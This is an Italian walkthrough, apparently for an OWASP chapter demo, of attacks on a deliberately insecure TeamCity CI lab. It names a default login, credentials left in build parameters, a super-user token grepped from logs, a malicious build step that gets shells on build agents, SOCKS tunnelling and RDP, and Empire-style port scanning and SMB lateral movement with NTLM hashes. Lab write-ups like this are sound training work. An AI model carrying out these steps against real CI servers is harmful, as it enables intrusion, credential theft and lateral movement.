
Un ambiente di integrazione continua TeamCity configurato in modo insicuro.
Lavori in corso: Il codice di deployment arriverà presto ... prima o poi.

Potrebbe esserci più di un percorso attraverso PwnCity, ma questo è quello che presenterò il 24 febbraio all'incontro dell'OWASP Sacramento Chapter.
Nota: La sicurezza operativa è in gran parte ignorata qui, poiché si tratta di una demo.
nmap -Pn -p- 52.234.0.18.
nmap 52.234.0.18 lo fa sembrare spento.nmap -Pn 52.234.0.18.


bob con password bobhacks?.
bob, vai su Projects > SimpleMavenSample > Build > Settings.Parameters contiene delle credenziali.

ssh [email protected], e accedi via SSH come utente con privilegi minimi.

Potremmo creare un tunnel dal nostro foothold iniziale. Sapere che RDP è aperto su due build agent ci permetterebbe di provare ad autenticarci con le credenziali trovate... ma non è altrettanto divertente.
cat /home/dev/TeamCity/TeamCity/logs/teamcity-server.log | grep "Super user".

Administration > Projects > Create project, e ottieni una shell sui build agent.

cmd.exe/c %system.teamcity.build.checkoutDir%/launcher.bat
Credenziali scelte da rockyou.txt.
PwnAgent01 ha Microsoft Defender abilitato. Sebbene sia sicuramente ancora possibile aggirarlo, lo step di build dannoso che abbiamo dimostrato verrà bloccato.



Questa sezione è solo una raccolta di frammenti utili durante l'amministrazione dell'ambiente di laboratorio.
TeamCity per accedere alle risorse locali ssh -D 9050 [email protected].proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.
... accanto a Run nel menu e poi l'agente desiderato che stai prendendo di mira. Se tutto va bene, un agente ti richiamerà.

powershell/situational_awareness/network/portscan. Scopri che 10.0.0.7 ha 3389,445,139,135 tutte aperte.

bruno.powershell/lateral_movement/invoke_smbexec per ottenere un beacon su Bruno-PC tramite hash NTML.
